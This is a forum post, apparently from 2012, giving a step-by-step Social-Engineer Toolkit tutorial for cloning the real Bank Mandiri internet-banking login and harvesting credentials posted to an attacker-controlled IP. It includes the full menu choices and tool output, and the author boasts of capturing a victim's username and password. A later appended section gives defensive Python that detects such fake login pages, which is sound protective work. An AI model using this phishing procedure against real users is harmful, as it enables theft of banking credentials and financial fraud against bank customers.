08-23-2012, 11:22 PM
OK, first of all I want to wish Minal Aidin wal Faizin to everyone at Indonesian Backtrack; may you all get more handsome and stay just as you are, hahaha.
OK, as the title says, this time I want to share a social-engineering method using SET to make a fake login for Bank Mandiri, hahaha, just for sharing.
OK, the tools needed:
1. A prayer
2. Backtrack 5R3
3. SET
4. wifi
OK, first say a prayer that it works.
Second, we open SET:
bt@xsan-lahci:~# cd /pentest/exploits/set/
bt@xsan-lahci:/pentest/exploits/set# ./set
Then there will be a prompt like this:
Do you agree to the terms of service [y/n]: y
Then the menu opens like this:
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1 <------------ choose no. 1
Then another menu opens like this:
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2 <------ choose no. 2
OK, next this menu opens:
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>3
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192.168.1.102 <--- fill in the attacker's IP
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone: https://ib.bankmandiri.co.id <------- fill in the website the fake login will be made from
Wait a moment and text like this will appear:
[*] Cloning the website: https://ib.bankmandiri.co.id
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.
Press <return> to continue
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
OK bro, look at the blue text above: that is the process where a fake login is running on port 80, which is the HTTP service.
The fake login has been created automatically by the SET tool. Back to the discussion:
Look at the image above and note the bottom line: the victim seems to have started accessing our cloned site, hahaha.
Bingo, check this out, hahaha.
I got the username and password, hahaha, for the Bank Mandiri login.
Note: tested on om zasad's BlackBerry phone.
OK, that's all for my noob tutorial; just for sharing, don't use it for blackhat jobs.
Thanks to om zasad, ares, cassaprodigy, zee eichel, and om wildhanovsky.
Time to prepare to move headquarters.
visit > https://xsanlahci.wordpress.com
All My Thread > http://indonesianbacktrack.or.id/forum/s...bd179f046e
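From the defender's side, the session in the post leaves three observable signs: the login form is served over plain HTTP on port 80, the page host is a bare IP address, and the form data goes to that IP instead of the bank's HTTPS origin. The following is an added example, not part of the original post or of SET: a Python check that flags those signs in a fetched page. The function names and the sample HTML are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit
class LoginForms(HTMLParser):
    """Collect the action of every <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self.actions, self._action = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self._action is not None and self._action not in self.actions:
                self.actions.append(self._action)
    def handle_endtag(self, tag):
        if tag == "form":
            self._action = None

def is_ip(host):
    try:
        ipaddress.ip_address(host or "")
        return True
    except ValueError:
        return False

def assess_login_page(page_url, html, expected_origin):
    page, good = urlsplit(page_url), urlsplit(expected_origin)
    forms = LoginForms()
    forms.feed(html)
    if not forms.actions:
        return []                      # no password form, nothing to assess
    findings = []
    if page.scheme != "https":
        findings.append("login form served without HTTPS")
    if is_ip(page.hostname):
        findings.append("page host is a bare IP address")
    if (page.scheme, page.hostname) != (good.scheme, good.hostname):
        findings.append("page origin differs from expected origin")
    for action in forms.actions:
        host = urlsplit(urljoin(page_url, action)).hostname
        if host != good.hostname:
            findings.append(f"form posts to unexpected host {host}")
    return findings

# Constructed sample: a login form reached over HTTP on a LAN address.
SAMPLE_HTML = '<form method="post" action="http://192.168.1.102/"><input name="u"><input type="password" name="p"></form>'
EXPECTED = "https://ib.bankmandiri.co.id"
if __name__ == "__main__":
    print(assess_login_page("http://192.168.1.102/", SAMPLE_HTML, EXPECTED))
```

The same four checks are what a user can verify by eye in the address bar, and what a proxy or mail gateway can apply to links before they reach a user.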